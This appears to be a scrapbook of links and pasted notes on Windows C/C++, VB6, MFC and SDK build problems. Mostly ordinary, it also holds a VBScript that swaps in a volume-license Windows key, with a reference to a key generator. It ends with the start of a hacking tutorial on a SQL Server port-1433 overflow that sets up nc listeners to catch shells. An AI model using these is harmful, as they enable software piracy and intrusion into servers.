StandardOutput.ReadLine() doesn’t work until the app exits??? – C# / C Sharp answers
http://bytes.com/topic/c-sharp/answers/612388-standardoutput-readline-doesnt-work-until-app-exits
Launching a process and displaying its standard output / General / C# Официальный сайт справочников World C++, World C#, ASM World
http://netcode.ru/dotnet/?lang=&katID=30&skatID=261&artID=7026
win32 GUI app that writes usage text to stdout when invoked as “app.exe –help” – Stack Overflow
http://stackoverflow.com/questions/54536/win32-gui-app-that-writes-usage-text-to-stdout-when-invoked-as-app-exe-help
AllocConsole()和AttachConsole()_编程笔记
http://hi.baidu.com/wuxicn/blog/item/1a14874602a2ce016a63e5c2.html
控制台应用程序与Windows应用程序_Happiness of Programing
http://hi.baidu.com/silyt/blog/item/5a67373ebb38d93870cf6cc3.html
在GUI程序中使用控制台的两种方法-方法.2 – 笔记 – 南郁 – CSDN学生大本营
http://student.csdn.net/space.php?uid=112600&do=blog&id=12217
让WPF窗体程序支持命令行方式运行的三种方式_雨枫技术教程网
http://www.fengfly.com/plus/view-83237-1.html
如何让WinMain程序像main程序一样在console中输入输出 — 编程爱好者论坛存档帖
http://www.programfan.com/club/showpost.asp?id=7517
CodeProject: QuickWin – Turn a console application into a Windows program. Free source code and programming help
http://www.codeproject.com/KB/dialog/quickwin.aspx
Code, Software …
http://www.rootsilver.com/2007/08/how-to-create-a-consolewindow
WinMain(windows程序的运行原理以及VC++的实现过程)_Ctrl+C
http://hi.baidu.com/neteasier/blog/item/f48075fa9cfdb716a9d31157.html
strcat_s 和 strcat 的区别_百度知道
http://zhidao.baidu.com/question/102856857.html
终于学会strcat_s了_dtx08_新浪博客
http://blog.sina.com.cn/s/blog_60c90f4b0100f2j3.html
先ps一句:网络这个东西是好,但是也容易以讹传讹。大家都图省事,结果把假的。错误的东西都传博出去了。
strcat_s脱胎于strcat,用于两个字符串的链接,strcat(str1,str2)直接返回新的str1.
但在vs2005后,为了安全起见,重新添加了些功能和api和以前不同。比如strcat_s.
为什么是安全起见呢?对于老的你添加str2的时候如果st1溢出怎么办?很明显这就是需要改进的地方。
所以新的strcat_s规定,有三个参数,必须指定str1的大小。所以应该这么来
char string[20]=”123″;
strcat_s(string,sizeof(string),”456″);
printf(“%s”,string);这样20个元素,足够装下123456了。
VC 取得程序所在目录的方法 – 晴阳Blog – 博客园
http://www.cnblogs.com/cnLiou/archive/2009/04/29/1445800.html
char pLocalPath[255];
memset(pLocalPath, 0, sizeof(pLocalPath));
GetModuleFileName(AfxGetInstanceHandle(), pLocalPath, sizeof(pLocalPath));
pLocalPath[strrchr(pLocalPath, '\\') - pLocalPath] = ‘\0′;
AfxMessageBox(pLocalPath);
以下函数是网上有人写好的, 稍微复杂点:
CString CXXXXXXApp::GetCurDir()
{
TCHAR sDrive[_MAX_DRIVE];
TCHAR sDir[_MAX_DIR];
TCHAR sFilename[_MAX_FNAME],Filename[_MAX_FNAME];
TCHAR sExt[_MAX_EXT];
GetModuleFileName(AfxGetInstanceHandle(), Filename, _MAX_PATH);
_tsplitpath(Filename, sDrive, sDir, sFilename, sExt);
CString homeDir(CString(sDrive) + CString(sDir));
int nLen = homeDir.GetLength();
if(homeDir.GetAt(nLen-1) != _T(‘\’))
homeDir += _T(‘\’);
return homeDir;
}
Adding Console I/O to a Win32 GUI App
http://www.halcyon.com/~ast/dload/guicon.htm
基于对话框的应用程序也可以有命令行输出窗口 – ziren235的专栏 – CSDN博客
http://blog.csdn.net/ziren235/archive/2006/11/13/1381736.aspx
基于对话框的应用程序也可以有命令行输出窗口_阿笨猫的窝
http://hi.baidu.com/abenmao32032/blog/item/1c736450e53520551138c27a.html
RedirectIOToConsole(“ “);
MFC中重载std::cout就可以使用cout – 沙加的日志 – 网易博客
http://ygdljg.blog.163.com/blog/static/54601046200893042229423/
MFC中重定向stdout,可以使用cout了! – swordzjj的专栏 – CSDN博客
http://blog.csdn.net/swordzjj/archive/2007/12/05/1918811.aspx
VC点滴 之 WinMain(windows程序的运行原理以及VC++的实现过程) – C/C++
http://www.host01.com/article/software/cc/20060917232844235.htm
Win32应用程序下的自定义消息使用问题 VC/MFC / 基础类 – CSDN社区 community.csdn.net
http://topic.csdn.net/t/20030313/12/1525734.html
VC中自定义消息实现_流水不腐 户枢不蠹
http://hi.baidu.com/dongxiang2007/blog/item/33b6831b7c6d2bf8af5133bc.html
Console: Demonstration of the Console Functions
http://msdn.microsoft.com/en-us/library/aa263818(VS.60).aspx
创建CMD进程,并且不关闭,怎么样读取CMD中信息显示到控件上。
http://topic.csdn.net/u/20091017/01/14ecfe58-80f4-4d1c-87e1-14038f9ddd4b.html?37868
怎样调用设备管理器中某个硬件的属性对话框 VC/MFC / 硬件/系统 – CSDN社区 community.csdn.net
http://topic.csdn.net/t/20030728/15/2080998.html
CodeProject: Device Property Sheet Dialog. Free source code and programming help
http://www.codeproject.com/KB/system/DevicePropertySheet.aspx?display=Print
如何调用设备属性对话框从应用程序或从命令提示符
http://support.microsoft.com/kb/815320
设备管理器的实现 – ljkong的专栏 – CSDNBlog
http://blog.csdn.net/ljkong/archive/2005/01/17/256742.aspx
关于PDEVICEPROPERTIES的问题 向高手们请教
http://topic.csdn.net/u/20080204/09/3bb0f1fc-5c7f-4af5-b618-778f40b8cd71.html
DeviceProperties_RunDLL Function Prototype
http://msdn.microsoft.com/en-us/library/aa476915.aspx
CodeProject: Device Property Sheet Dialog. Free source code and programming help
http://www.codeproject.com/KB/system/DevicePropertySheet.aspx?fid=83880&df=90&mpp=25&noise=3&sort=Position&view=Quick&fr=26
#define DeviceProperties_RunDLL "DeviceProperties_RunDLLA" typedef void (_stdcall *PDEVICEPROPERTIES)( HWND hwndStub, HINSTANCE hAppInstance, LPSTR lpCmdLine, int nCmdShow );
Windows XP Control Panel, Shortcuts and Control.exe
http://vlaurie.com/computers2/Articles/control.htm
How to Configure Device Manager to Display Detailed Information
http://www.digitalsupporttech.com/kb/304514/
Click Start, click Run, type cmd.exe, and then press ENTER.
2. Type set DEVMGR_SHOW_DETAILS=1, and then press ENTER.
3. Type start devmgmt.msc, and then press ENTER. In Device Manager the properties for a device should now provide a Details tab that contains additional information about the device.
How to change COM port number – CodeGuru Forums
http://www.codeguru.com/forum/showthread.php?t=375882
How to invoke the device Properties dialog box from the application or from a command prompt
http://www.digitalsupporttech.com/mskb/815/815320_How_to_invoke_the_device_Properties_dialog_box_from_the_application_or_from_a_command_prompt.htm
rundll32.exe devmgr.dll,DeviceProperties_RunDLL /DeviceID "PCI\\VEN_8086&DEV_2445 &SUBSYS_010E1028&REV_12\\3&172E68DD&0&FD"
How to change COM port number – technical discussion – developerFusion – the global developer community
http://www.developerfusion.com/forum/thread/34271/
Dx21 – RunDLL32
http://www.dx21.com/coding/libraries/rundll32/Default.aspx?ID=203
You can open the properties dialog of any device attached to your computer and listed in the Device Manager by calling the devmgr.dll, using the DeviceProperties_RunDLL function with the /DeviceID and the registry path of the device.
The registry path of the device starts at HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Enum and is typically the next three folders down (starting with ACPI, Root, HID, etc.). The target folder will contain the ClassGUID key.
Example calls:
Rundll32.exe devmgr.dll DeviceProperties_RunDLL /DeviceID ACPI\\PNP0000\\4&11876118&0
Rundll32.exe devmgr.dll DeviceProperties_RunDLL /DeviceID Root\\VSO_IOCD\\0000
Rundll32.exe devmgr.dll DeviceProperties_RunDLL /DeviceID HID\\Vid_046d&Pid_c404\\6&1ee4c77f&0&0000
RUNDLL32.EXE devmgr.dll DeviceProperties_RunDLL /DeviceID &leftsign;Key\\Key\\Key&rightsign;
JSI Tip 5680. How can I add a Details tab to the Windows XP Device Manager Properties dialog?
http://windowsitpro.com/articles/index.cfm?articleid=76984
Failure to Navigate to Device Driver under SYSTEM in Contr..
http://forum.soft32.com/windows/Failure-Navigate-Device-Driver-SYSTEM-Control-Panel-ftopict278299.html
JSI Tip 6490. How do I invoke the device Properties dialog box from the command line?
http://windowsitpro.com/article/articleid/77792/jsi-tip-6490-how-do-i-invoke-the-device-properties-dialog-box-from-the-command-line.html
To invoke the device Properties dialog from the command line, see the following examples:
rundll32.exe devmgr.dll DeviceProperties_RunDLL /DeviceID root\\system\\0000
rundll32.exe devmgr.dll DeviceProperties_RunDLL /DeviceID ACPI_HAL\\PNP0C08\\0
rundll32.exe devmgr.dll DeviceProperties_RunDLL /DeviceID "PCI\\VEN_8086&DEV_2445 &SUBSYS_010E1028&REV_12\\3&172E68DD&0&FD"
CodeProject: Changing your Windows audio device programmatically using VC++. Free source code and programming help
http://www.codeproject.com/KB/system/AudioConfigurationManager.aspx
更改WinXP的序列号 爱问知识人
http://iask.sina.com.cn/b/1989614.html?from=related
ON ERROR RESUME NEXT
Dim VOL_PROD_KEY
if Wscript.arguments.count<1 then
VOL_PROD_KEY=InputBox("使用说明(OEM版无效):"&vbCr&vbCr&" 本脚本程序将修改当前 Windows 的序列号。请先使用算号器算出匹配当前 Windows 的序列号,复制并粘贴到下面空格中。"&vbCr&vbCr&"输入序列号(默认为 XP VLK):","Windows XP/2003 序列号更换工具","PJVCV-XCPPF-6GTKK-QXRPY-FBKGJ")
if VOL_PROD_KEY="" then
Wscript.quit
end if
else
VOL_PROD_KEY = Wscript.arguments.Item(0)
end if
VOL_PROD_KEY = Replace(VOL_PROD_KEY,"-","") \’remove hyphens if any
for each Obj in GetObject("winmgmts:&leftsign;impersonationLevel=impersonate&rightsign;").InstancesOf ("win32_WindowsProductActivation")
result = Obj.SetProductKey (VOL_PROD_KEY)
if err = 0 then
Wscript.echo "您的 Windows CD-KEY 修改成功。请检查系统属性。"
end if
if err <> 0 then
Wscript.echo "修改失败!请检查输入的 CD-KEY 是否与当前 Windows 版本相匹配。"
Err.Clear
end if
Next
装sp3时提示:用来启动计算机的核心系统文件kernel不是windows文件&line;系统评测 – 系统之家论坛
http://www.xtzj.com/read-htm-tid-257422.html
安装Windows XP Service Pack3(KB936929)出现问题_百度知道
http://zhidao.baidu.com/question/72992783.html?fr=qrl&fr2=query
解决方案
1. 单击确定关闭错误信息。
2. 使用"控制面板"上的"添加或删除程序"删除自定义启动图形的程序。
3. 重新启动计算机,然后尝试重新安装 SP1。如果仍出现此问题,请转到第 4 步。
4. 在桌面上,右击我的电脑,然后单击属性。
5. 单击高级选项卡,然后单击"启动和故障恢复"下的设置。
6. 在系统启动下,单击编辑。Boot.ini 文件在记事本中打开。
7. 找到并删除 /KERNEL= 命令选项。
8. 保存并关闭 Boot.ini 文件。
9. 重新启动计算机。
10. 尝试安装 Windows XP SP3。
出现此问题的原因原因
如果计算机中有 Ntoskrnl.exe 文件的修改后的版本,并且该版本使用了 Boot.ini 文件中的 /KERNEL 命令选项,则可能发生此行为。存在此情况是因为计算机上安装的某个第三方程序自定义计算机启动时显示的图形。导致此情况的第三方程序包括以下几个:
BootXP
LogonUI Boot Randomizer
这个方法是解决无法更新SP1的,但是我个人用了,也能解决SP3的此问题,方法是微软提供的.此问题出现的原因大概就是因为你用第三方软件改过系统主题,启动画面或者登陆换面.
删除 /Kernel=ntoskrnl.exe 即可
用来启动此计算机的核心系统文件KERNEL不是MICROSOFT WINDOWS的原文件 SERVICE PACK不会被安装 Windows专区 / Windows NT/2000/XP/2003 – CSDN社区 community.csdn.net
http://topic.csdn.net/t/20060523/08/4771131.html
20080710 vs2008 lc.exe
http://www.yippeesoft.com
错误 67 任务失败,原因是未找到“LC.exe”,或未安装正确的 Microsoft Windows SDK。该任务正在注册表项 HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Microsoft SDKs\\Windows\\v6.0A 的 InstallationFolder 值中指定的位置下的“bin”子目录中查找“LC.exe”。您可以通过执行下列操作之一来解决这一问题: 1) 安装 Microsoft Windows SDK for Windows Server 2008 和 .NET Framework 3.5。 2) 安装 Visual Studio 2008。 3) 将上面的注册表项手动设置到正确的位置。 4) 将正确位置传入任务的“ToolPath”参数。 Platform.Winform
Error 1 Task failed because "LC.exe" was not found, or the correct Microsoft Windows SDK is not installed. The task is looking for "LC.exe" in the "bin" subdirectory beneath the location specified in the InstallationFolder value of the registry key HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Microsoft SDKs\\Windows\\v6.0A. You may be able to solve the problem by doing one of the following: 1) Install the Microsoft Windows SDK for Windows Server 2008 and .NET Framework 3.5. 2) Install Visual Studio 2008. 3) Manually set the above registry key to the correct location. 4) Pass the correct location into the "ToolPath" parameter of the task. Cypher1
把水晶报表勾选重装 OK
多了 Microsoft Windows SDK v6.0A
酷睿T5750比P3.0G真是快多了·····
I reinstalled the .NET 3.5 framework, but made no difference.
“““““““““““““““`
I did a reinstall using full instead of typical and it works now
Nevermind. I reinstalled the SDK again and it works now.
Problem #3: Cannot find the .NET 2.0 SDK
The first .csproj that get\’s build gives the following warning early in the build:
Could not locate the .NET Framework SDK. The task is looking for the path to the .NET Framework SDK at the location specified in the SDKInstallRootv2.0 value of the registry key HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\.NETFramework. You may be able to solve the problem by doing one of the following: 1.) Install the .NET Framework SDK. 2.) Manually set the above registry key to the correct location.
I dutifully checked the registry and found that the required key was missing. Further research reveals that while VS2008 does support builds targeting the 3.0 framework (as does my build), it always builds again the v3.5 framework which ships with the compiler. The compiler just figures out what stuff to leave out so that assemblies targeted for v2.0 or v3.0 still build and run. The problem with my .csproj files is that they are not upgraded to VS2008 (and shouldn\’t be) and so they are still looking for the old v2.0 SDK folder. That should be an easy fix… I downloaded the .NET 2.0 SDK from Microsoft and installed it. I verified the expected registry key is created and pointing to the installation folder. Good.
Build again. Voila! No more ugly warning. But quickly another failure.
This bug is being resolved as “External”. This means that your issue is being moved from the Visual Studio bug database into the Windows SDK bug database. We will close your original bug. Because the bug databases don’t talk to each other at present, further communications about this issue will need to be in email in order for me to see them. You can post your response here on the Connect, but you must also email me (karinm@microsoft.com) to ensure I get your communication. I’ll post a response on the Connect Site and email you back directly.
In answer to your issue:
The Windows SDK Configuration Tool works by changing the CurrentInstallFolder value in the registry. VS looks for the "currentInstallFolder" value first in
HKEY_CURRENT_USER\\Software\\Microsoft\\Microsoft SDKs\\Windows\\
And if that key is missing, if will look next in
HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Microsoft SDKs\\Windows\\
The standalone Windows SDK, and the Windows SDK content embedded in Visual Studio sets both keys, but in your situation it appears that the SDK Configuration Tool might only be updating HKEY_LOCAL_MACHINE. Therefore, whichever SDK was installed last will be the one set in the CurrentInstallFolder. Using the SDK Configuration Tool will have no effect.
The workaround is to update HKEY_CURRENT_USER to point to the version of the SDK that you wish to build with:
1. HKEY_CURRENT_USER\\Software\\Microsoft\\Microsoft SDKs\\Windows\\ CurrentInstallFolder = C:\\Program Files\\Microsoft SDKs\\Windows \\v6.0A\\ to build with the Windows SDK content included in VS2008; or
2. HKEY_CURRENT_USER\\Software\\Microsoft\\Microsoft SDKs\\Windows\\ CurrentInstallFolder = C:\\Program Files\\Microsoft SDKs\\Windows \\v6.1\\ to build with the Windows SDK content included in the Windows SDK for Server 2008.
Please give this a try and let me know if it fixes your issue. Please contact me directly at karinm@microsoft.com.
The Windows SDK for Windows Server® 2008 and .NET Framework 3.5 provides documentation, samples, header files, libraries, and tools designed to help you develop Windows applications using both native (Win32®) and managed (.NET Framework) technologies.
The .NET Framework 3.5 is still based on CLR 2.0 + updates that 3.5 ships with it. .NET Framework 3.5 ships with Express, but you can get it stand alone with the compilers (without IDE integration until Visual Studio 2008) by downloading it from: http://www.microsoft.com/downloads/details.aspx?FamilyId=333325FD-AE52-4E35-B531-508D977D32A6&displaylang=en
So the only thing which seemed to work is re-installing the SDK again. It can be found here.
1.
Correct link
http://blogs.msdn.com/windowssdk/archive/2008/02/07/windows-sdk-rtms.aspx
http://www.microsoft.com/downloads/details.aspx?FamilyId=F26B1AA4-741A-433A-9BE5-FA919850BDBF&displaylang=en
http://www.microsoft.com/downloads/details.aspx?FamilyId=E6E1C3DF-A74F-4207-8586-711EBE331CDC&displaylang=en
一、如果使用MSBuild任务的话,需要把ThoughtWorks.CruiseControl.MSBuild.dll文件拷贝到工作目录下才能正常编译。
二、如果提示找不到LC.exe,(在没有安装Vs 2005的机器执行每日构建)需要把lc.exe(在有安装VS 2005的安装目录下的Microsoft Visual Studio 8\\SDK\\v2.0\\Bin)拷贝到对应的Microsoft Visual Studio 8\\SDK\\v2.0\\Bin目录下,然后修改注册表HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\. NETFramework 下新增一个字符串值SDKInstallRootv2.0 指向系统目录的Microsoft Visual Studio 8\\SDK\\v2.0 目录(不能到bin目录)
三、使用VSS做为源码服务器必须安装VSS客户端。
***EndOfSession***[07/08/08,19:20:41] MSITOSIT: [2] ERROR processed; exception was thrown for retail build
Developer Comment: : has no associated directory, verify the Feature table is correct
20080412 activex exe regsvr32
http://www.yippeesoft.com
您可以在命令窗口中键入这些命令,或者单击 Windows开始 菜单中的运行 ,然后键入命令。
要注册组件,请键入下列命令:
<path>\\<mycomponent> /regserver
其中,<path> 是组件的路径,<mycomponent> 是组件的名称。
要注销组件,请键入下列命令:
<path>\\<mycomponent> /unregserver
其中,<path> 是组件的路径,<mycomponent> 是组件的名称。
当您第一次运行 EXE 时,Visual Basic ActiveX EXE 文件会自动注册。不过,直到注册 EXE 后,EXE 才能用作 COM 服务器。
如果您使用“程序包和部署向导”或“应用程序安装向导”分发 ActiveX EXE,在安装应用程序时将自动注册 EXE。
如果您是在“Visual Basic 集成开发环境 (IDE)”中工作,并且使用References(引用) 对话框浏览到未注册的 ActiveX EXE 的文件位置,当您将 EXE 作为引用添加到项目中时,将注册组件。
Regsvr32命令修复系统故障实例使用过activex的人都知道,activex不注册是不能够被系统识别和使用的,一般安装程序都会自动地把它所使用的activex控件注册,但如果你拿到的一个控件需要手动注册怎么办呢?如果修改注册表那就太麻烦了,在windows的system文件夹下有一个regsvr32.exe的程序,它就是windows自带的activex注册和反注册工具。
2000系统的regsvr32.exe在winnt\\system32文件夹下;
WInXP系统的regsvr32.exe在windows\\system32文件夹下
regsvr32的用法为:
"regsvr32 [/s] [/n] [/i(:cmdline)] dllname”。其中dllname为activex控件文件名,建议在安装前拷贝到system文件夹下。
参数有如下意义:
/u——反注册控件
/s——不管注册成功与否,均不显示提示框
/c——控制台输出
/i——跳过控件的选项进行安装(与注册不同)
/n——不注册控件,此选项必须与/i选项一起使用
执行该命令的方法:
1、可以在“开始”–“运行”,调出运行的对话框,也可以使用Win+R热键,然后直接在输入栏输入即可
2、在开始–运行 输入cmd,调出‘命令提示符’窗口,然后再执行regsvr32命令。
二、Regsvr32错误消息的说明
当使用 Regsvr32.exe 时,它会尝试加载该组件并调用它的 DLLSelfRegister 函数。如果此尝试成功,Regsvr32.exe 会显示一个指示成功的对话框。如果此尝试失败,Regsvr32.exe 会返回一条错误消息,其中可能会包括一个 Win32 错误代码。
以下列表介绍了 RegSvr32 错误消息和可能的原因。
Unrecognized flag:/invalid_flag
键入的标志或开关组合无效(请参阅本文中的“Regsvr32.exe 的用法”一节)。
No DLL name specified.
未包括 .dll 文件名(请参阅本文中的“Regsvr32.exe 的用法”一节)。
Dllname was loaded, but the DllRegisterServer or DllUnregisterServer entry point was not found.
Dllname不是.dll 或.ocx 文件。例如,键入 regsvr32 wjview.exe 就会生成该错误消息。
例如,键入regsvr32 icwdial.dll 后就会返回该错误消息,因为 Icwdial.dll 文件不能自行注册。如果您怀疑内存中有损坏的Dllname 版本,请尝试重新启动计算机,或重新提取该文件的原始版本。如果您运行的是 Windows NT,可能需要使用 Microsoft Windows NT Server 4.0 资源工具包 中的 Kill 或 Pview 工具。有关其他信息,请单击以查看以下 Microsoft 知识库文章:197155 如何终止孤立进程OleInitialize failed (or OleUninitialize failed).
Regsvr32 必须先初始化 COM 库,然后才能调用所需的 COM 库函数并在关闭时撤消对该库的初始化。
标签:active, activex, exe20080302 vb 多线程 ActiveX Exe
http://www.yippeesoft.com
实现方式:
使用VB做ActiveX Exe,创建类型是"MultiUse"的Class,同时创建保存数据用的模块module.
这样模块中的数据便可以为“所有创建ActiveX Exe实例的对象”所共用,用此实现了数据共享。
注意:
实现中发现,不同线程或不同进程多次创建ActiveX-Exe时,ActiveX-Exe以及其中的Class还是被创建了多个实例。因此在Class中定义公共数据是达不到目的的,必须创建一个模块来存储数据。
这样做出来的ActiveX-Exe经过测试是线程安全和进程安全的。不必使用Mutex等技术保护数据访问的安全。
vb的Activex Dll 并不能自己创建线程..(挂接vb客户端的线程)
但可以通过单元线程来实现多线程DLL.
其实就是这样一种情形.
每个客户端线程创建的dll对象在一个单独的单元中.
单元线程DLL
客户1(线程1)——> 单元1 [对象1] [对象2] [对象3]
客户2(线程2)——> 单元2 [对象4] [对象5]
他们可以互不影响..
但这只是对多个客户端时才有用啊.
这样的多线程意义大吗??
activex dll 有单线程和单元线程 方式..编译的时候 可以 选择 Apartment Threaded(方式就是上面的)
或 Single Threaded
activex exe 进程外组件,有两种方式.一个是 Thread per Object (每个对象对应一个线程)
还有就是 Thread Pool (线程池) —–可以指定一定数量的线程.在这个缓冲池内
每个对象都在缓冲池的下一个线程上创建,到达了缓冲池的最后一个线程之后它又从第一个线程开始..
多线程主要是在win9x以后广泛应用的。
设想一下,如果一个程序是Single Threaded ,呵呵,那么微软的操作系统早就崩溃了。
我想,多线程主要是解决资源浪费的问题。系统并不一定要等待一个线程运行结束草可以进行下一次操作。
所谓CPU的时间片就是为多线程准备的,每一个线程都有自己的优先级,并且根据优先级得到系统分配的时间片。CPU根据时间片给各个线程分配处理时间。
这样,就可以解决多个线程同时运行的实例。同时防止一个线程过长的时间占据CPU资源,但是光是这些还是不够的。对线程的资源管理也是很重要的。所以就引入了缓冲池。这样可以尽量压缩不必要的资源消耗。
VB对多线程的支持不好,但是在VB.NET中却得到了很好的支持。在VB6的单元线程我认为还是很不完善的,对于COM而言的DLL不支持内存数据库和缓冲对象。可能VB设计者的本意就是不要过于复杂。
如果要写真正的多线程程序,一般都是使用VC。而VB只是上层界面的设计。这就是很多大公司的做法。使用VC写底层,VB写界面。
http://www.readygo.com.cn/it-547698.html
vb里面有没有类似于java中线程的概念?
创建多线程的测试应用程序
为了测试和调试进程内部件(.dll 和 .ocx 文件),需要一个多线程的客户应用程序。创建一个简单的多线程应用程序的步骤如下:
打开一个新的 ActiveX EXE 工程,将默认的类模块命名为 MainApp 。把 MainApp 的 Instancing 属性设成为 PublicNotCreatable 。MainApp 对象将占有这个应用程序的第一个线程,并显示主用户界面。
在“工程属性”对话框的“通用”选项卡上,在“启动对象”框中选择“Sub Main”,在“线程模块”框中选择“每个对象对应一个线程”,并输入一个具有唯一性的工程名称。(工程名称决定类型库的名称;如果两个应用程序的类型库名称相同的话将会出现问题。)"ThreadDemo" 是下例所用的工程名称。在“部件”选项卡上,在“启动模式”框中选择“独立方式”。
增加一个窗体,将它命名为 frmProcess ,并将其 Visible 和 ControlBox 属性设成 False 。 这个窗体将以隐藏窗口的方式运行,其中 Sub Main 用来标识该进程的主线程。这个窗体不需要代码。
在工程中增加一个标准模块。把声明、 Sub Main 过程、以及下面显示的 EnumThreadWndMain 过程放在这个模块中。正如在相应的文字和代码注释中所说明的,在启动应用程序以及每次创建一个新的线程时,都要执行 Sub Main 。 Sub Main 的示例代码演示了如何标识第一个线程,这样就能知道何时创建 MainApp。
增加一个窗体,将它命名为 frmMTMain 。这个窗体为这个测试应用程序提供主用户界面。在这个窗体中增加简单的声明,并把紧在“测试应用程序的多个实例”标头上面的 Form_Unload事件也加进去。
在 MainApp 的 Class_Initialize 事件过程中增加代码以显示 frmMTMain。详见下面的代码。
要创建另外的测试线程,则在工程中应该至少有一个 Instancing 属性被设成 MultiUse 的类。增加一个类模块和一个窗体,插入“创建新线程”标头下的代码。由于这个工程选择了“每个对象对应一个线程”,因此每个在外部创建的公共对象都会启动一个新的线程。这就是说,可以通过使用 CreateObject 函数创建带程序标识符( ProgID )的 MultiUse 类的实例,来创建一个新的线程,见相应文字中的说明。
向 frmMTMain 中增加代码,通过创建所定义的 MultiUse 类的实例来创建新的线程。有关代码在下面这个示例的“创建新线程”标头下。
开发环境不支持多线程。如果按 F5 键运行工程,所有的对象将被创建在同一个线程中。为了测试多线程的行为,必须编译 ActiveX EXE 工程,然后运行最终的可执行程序。
重点 为了保证每个新的 MultiUse 对象都能启动一个新线程,必须使用“每个对象对应一个线程”选项而不能用“线程缓冲池”选项。
在 Sub Main 中决定主线程
每个新的线程都会执行 Sub Main 。这是因为 Visual Basic 为每个线程(即每个单元)都维护了一个全局数据的独立副本。为了初始化线程的全局数据,必须执行 Sub Main 。这就是说如果 Sub Main 加载了一个隐藏的窗口,或者显示了应用程序的主用户界面,那么在创建每个新线程时都会加载这些窗体的新副本。
Private Const MyEvent As String = "m5home"
Dim hEvent As Long
Sub Main()
If GetEventHandle = 0 Then \’由于每个新对象的建立,都要执行Main()过程,因此使用事件对象来进行判断.
hEvent = CreateEvent(0&, False, False, MyEvent) \’在单元线程下,模块里的全局变量已经没有用了.
frmMain.Show
End If
End Sub
Private Function GetEventHandle() As Long
GetEventHandle = OpenEvent(EVENT_ALL_ACCESS, False, MyEvent)
Call CloseHandle(GetEventHandle)
End Function
Public Function Quit()
Call CloseHandle(hEvent)
End Function
Private Const MyEvent As String = "m5home"
Dim hEvent As Long
Sub Main()
If GetEventHandle = 0 Then \’由于每个新对象的建立,都要执行Main()过程,因此使用事件对象来进行判断.
hEvent = CreateEvent(0&, False, False, MyEvent) \’在单元线程下,模块里的全局变量已经没有用了.
frmMain.Show
End If
End Sub
Private Function GetEventHandle() As Long
GetEventHandle = OpenEvent(EVENT_ALL_ACCESS, False, MyEvent)
Call CloseHandle(GetEventHandle)
End Function
Public Function Quit()
Call CloseHandle(hEvent)
End Function
对于 ActiveX Exe 工程,既可以指定每个新对象在一个新线程上创建(Thread per Object),也可以把部件限制在固定的线程池上。线程池大小为 1 则工程变为单线程的;线程池数目大于 1 则使工程变为单元线程的。
注意 当改变现有工程的线程模式时,如果工程使用了单线程 ActiveX 控件,则会产生一个错误。Visual Basic 禁止在使用单元线程的工程中使用单线程控件,这将在下面的“将现有的工程转换为单元模式线程化的工程”中说明。
注意 如果为 ActiveX Exe 工程指定了“每个对象对应一个线程”(或者是数目多于一个的线程缓冲区),那么只有外部创建的对象才会在新线程中创建。(请参阅“设计多线程进程外部件”。)对于 ActiveX DLL 和 ActiveX 控件工程,“每个对象对应一个线程”和“线程缓冲池”是不可用的,这是因为线程的创建是由客户应用程序控制的。
重点 对于专业版和企业版的用户,关于选择“每个对象对应一个线程”或“线程缓冲池”的效果的详细讨论,请参阅“设计多线程进程外部件”。
我在我的AcitveX EXE中有一个窗体,上面有一个MSCOMM控件和一个Timer控件.
由于要四个串口同时通信,那么我在类clsComm中:
Private mForm as Form1
Private withevents mTimer as Timer
Private mMscomm as Mscomm
Private Sub Class_Initialize()
Set mForm = New Form1 //保持对窗体中控件的引用
Load Form1
Set mTimer = mForm.Timer1
Set mMscomm = mForm.MSComm1
End Sub
Private Sub Class_Terminate()
Set mTimer = Nothing
Set mMscomm = Nothing
Unload mForm
Set mForm = Nothing
End Sub
然后在:
mTimer_Timer()事件中实现了发送串口数据的工作,并把数据给存放到一个数据库的表T1中去.
当然这个类也包含了OpenTimer(),SetComm()等基本的外部函数来控制.
—————————————————————————————–
在客户端应用程序中,我只用了一个Datagrid来动态绑定了表T1的内容,然后隔2s显示一次数据
定义了四个clsComm对象,我用:
Private withEvents clsComm1 as clsComm
Private withEvents clsComm2as clsComm
Private withEvents clsComm3 as clsComm
Private withEvents clsComm4 as clsComm
Form_Load()中
Set clsComm1 = New clsComm
Set clsComm2 = New clsComm
Set clsComm3 = New clsComm
Set clsComm4 = New clsComm
clsComm1.SetComm(1,9600,8,n,1)
….Comm2-Comm4雷同
Command1_Click()中打开Com1口并定时开始发送和接受数据
Call clsComm1.OpenTimer()
…Command2-Command4雷同
运行状态还算好,CPU占有率只达到7%以下
——————————————————————————————–
现在我的问题就是:
1>ActiveX EXE对于客户程序而言是独立的,也就是说在定时器中的代码执行是分别独立的,但是ActiveX EXE中的clsComm类的不同实例之间是否仍然是一个线程中执行呢???
因为我的这个服务器在执行一段时间(4小时,3小时或1小时,甚至更短时间)后,就会变"无响应"(在任务管理器中看到),而且无法关闭它,此时的客户端如果再调用任何服务器端的方法就会显示 "部件请求挂起",让选择"切换到…","重试"等妈作,选择过后客户端程序也没有响应了,但它可以通过任务管理器来关闭.
后来看到"工程属性"中有一个选择"每一个对象对应一个线程",我想问一下,是不是由于这个才会导致这个问题??
能解释一下,选择"每一个对象对应一个线程"有什么特别用处吗???对我这个程序要求是否有用???
20071205 VTTray.exe 1433
http://www.yippeesoft.com
笔者Sam 是黑客技术研究和安全的管理员(21183991 )如好了,说正题了。 sql(1433)溢出漏洞的利用。用到工具:nc,sqlhello 用nc监听: 写成如下的批处理: @echo off @start nc -vv -l -p 2004 @start nc -vv -l -p 2004 @start nc -vv -l -p 2004 @pause 附:nc的用法: options: -d detach from console, stealth mode -e prog inbound program to exec [dangerous!!] -g gateway source-routing hop point[s], up to 8 -G num source-routing pointer: 4, 8, 12, … -h this cruft -i secs delay interval for lines sent, ports scanned -l listen mode, for inbound conNECts -L listen harder, re-listen on socket close -n numeric-only IP addresses, no DNS -o file hex dump of traffic -p port local port number -r randomize local and remote ports -s addr local source address -t answer TELNET negotiation -u UDP mode -v verbose [use twice to be more verbose] -w secs timeout for connects and final net reads -z zero-I/O mode [used for scanning] 我们用到的几个参数:-v -l -p -v (verbose)是什么?直译为:详细的意思。我理解就是详细的信息。很多时候这样用:-vv -l 是什么?就是监听的意思(listen)。-p 应该不用说了,就是port的缩写。 